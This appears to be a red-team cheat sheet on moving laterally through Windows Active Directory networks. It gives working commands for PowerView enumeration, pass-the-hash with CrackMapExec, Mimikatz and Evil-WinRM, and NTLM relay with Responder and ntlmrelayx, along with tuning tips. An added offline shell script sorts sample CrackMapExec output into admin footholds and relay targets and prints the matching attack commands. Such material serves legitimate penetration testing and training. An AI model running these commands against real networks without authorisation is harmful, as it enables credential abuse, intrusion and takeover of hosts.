Lateral Movement

  1. PowerView Description: Enumerate Active Directory from a domain-joined PowerShell session (members of privileged groups, where users have active sessions, which shares are readable) to pick hosts worth moving to. Load the script first; the older Get-Net* names below are kept as aliases in current PowerView, whose native names are Get-DomainGroupMember, Get-NetSession and Find-DomainShare. Remote session enumeration needs the NetSessionEnum right, which newer Windows builds restrict to administrators by default, so expect empty results on hardened hosts. Tools/Commands:

    • Import-Module .\PowerView.ps1; Get-NetGroupMember -GroupName "Administrators"

    • Get-NetSession -ComputerName <HOST>

    • Find-DomainShare -CheckShareAccess

  2. Pass-the-Hash (PtH) Description: Authenticate to remote systems over NTLM with an account's NT hash instead of its password; no cracking is needed because the NTLM challenge-response uses the hash itself. Use the raw NT hash (32 hex characters); if a dump prints LM:NT, the NT half is the second value. Domain accounts work anywhere they have rights. Local accounts other than the built-in RID-500 Administrator are blocked from remote admin access by UAC token filtering unless LocalAccountTokenFilterPolicy has been set. Tools/Commands:

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -H <HASH>  (add --local-auth for local accounts; "Pwn3d!" in the output means the account is a local admin on that host)

    • Mimikatz: sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:cmd.exe  (run elevated; the spawned process uses the hash for its network logons)

    • Evil-WinRM: evil-winrm -i <IP> -u <USER> -H <HASH>  (needs WinRM reachable on TCP 5985/5986 and the user in Administrators or Remote Management Users)

  3. NTLM Relay Description: Intercept an inbound NTLM authentication (typically provoked by LLMNR/NBT-NS poisoning) and forward it to another host, so the victim's credentials authenticate the attacker there without ever being cracked. SMB relay only works against targets that do not require SMB signing; domain controllers require signing by default, so they are usually not valid SMB relay targets. Tools/Commands:

    • NTLMRelayX: ntlmrelayx.py -t smb://<target> -smb2support  (or -tf <targets.txt> to relay to a list of hosts)

    • Responder: responder -I <interface>  (when relaying, first set SMB = Off and HTTP = Off in Responder.conf so ntlmrelayx can bind those ports and receive the authentication)

    • CrackMapExec: crackmapexec smb <RANGE> --gen-relay-list <targets.txt>  (writes the hosts with SMB signing not required; a plain -u/-p login test does not find relay targets)
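The following shell helpers are an added example for items 2 and 3 and are not part of the original page or of CrackMapExec/Impacket. They never touch the network: CME_OUTPUT is constructed sample text in the shape CrackMapExec prints (hosts corp.local, 10.0.0.5/7/9, account svc_backup, and the NT hash of the word "password" are all made up for the example), and the functions nt_hash, pth_cmd, pwned_hosts, user_only_hosts, relay_targets and relay_cmd are names chosen here. They show the checks a practitioner does between the commands above: validating the hash before spraying it, separating "authenticated" from "local admin" results, and turning the banner lines into an ntlmrelayx target list.

```shell
#!/bin/sh
# Added example (not from the original page or from any tool's own code).
# Offline helpers around the CrackMapExec / ntlmrelayx commands listed above.

# Normalise a hash for pass-the-hash: accept "NT" or "LM:NT" as printed by
# mimikatz/secretsdump, keep only the NT half, require exactly 32 hex chars.
nt_hash() {
  h="${1##*:}"                       # drop an LM prefix if present
  case "$h" in
    *[!0-9a-fA-F]*) return 1 ;;      # non-hex character
  esac
  [ "${#h}" -eq 32 ] || return 1     # NT hashes are 16 bytes = 32 hex chars
  printf '%s\n' "$h" | tr 'A-F' 'a-f'
}

# Print (do not run) the CrackMapExec pass-the-hash line for one target.
pth_cmd() {
  nt=$(nt_hash "$3") || { echo "pth_cmd: not an NT hash: $3" >&2; return 1; }
  printf 'crackmapexec smb %s -u %s -H %s\n' "$1" "$2" "$nt"
}

# Constructed CrackMapExec SMB output (not a real capture): one banner line
# per host, then the result of spraying svc_backup's hash across them.
CME_OUTPUT='SMB  10.0.0.5  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.0.0.7  445  WS01  [*] Windows 10.0 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  10.0.0.9  445  FS01  [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB  10.0.0.5  445  DC01  [+] corp.local\svc_backup:8846f7eaee8fb117ad06bdd830b7586c
SMB  10.0.0.7  445  WS01  [+] corp.local\svc_backup:8846f7eaee8fb117ad06bdd830b7586c (Pwn3d!)
SMB  10.0.0.9  445  FS01  [+] corp.local\svc_backup:8846f7eaee8fb117ad06bdd830b7586c'

# Each filter reads CME output on stdin and prints the IP (field 2) per match.

# Hash authenticated AND the account is a local admin ("Pwn3d!"):
# these hosts take psexec/wmiexec/evil-winrm with the same hash.
pwned_hosts() { awk '/\(Pwn3d!\)/ { print $2 }'; }

# Hash authenticated but no admin: no shell, but share and RPC enumeration
# still works as that user.
user_only_hosts() { awk '/\[\+\]/ && !/\(Pwn3d!\)/ { print $2 }'; }

# Banner shows signing not required: the only hosts SMB relay can succeed on.
relay_targets() { awk '/\(signing:False\)/ { print $2 }'; }

# Write the relay target list to the given file and print the matching
# ntlmrelayx invocation (-tf takes a file of targets, -smb2support is needed
# for modern clients).
relay_cmd() {
  relay_targets > "$1"
  printf 'ntlmrelayx.py -tf %s -smb2support\n' "$1"
}

# Example run on the constructed output.
echo "local admin via PtH on:"; printf '%s\n' "$CME_OUTPUT" | pwned_hosts
echo "authenticated only on:";  printf '%s\n' "$CME_OUTPUT" | user_only_hosts
echo "SMB relay candidates:";   printf '%s\n' "$CME_OUTPUT" | relay_targets
```

On the constructed data the domain controller authenticates the hash but is neither admin-accessible nor relayable (signing:True), which is the usual picture: the workstation with "Pwn3d!" is the PtH foothold, and the two hosts without signing are where a captured authentication can be relayed.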
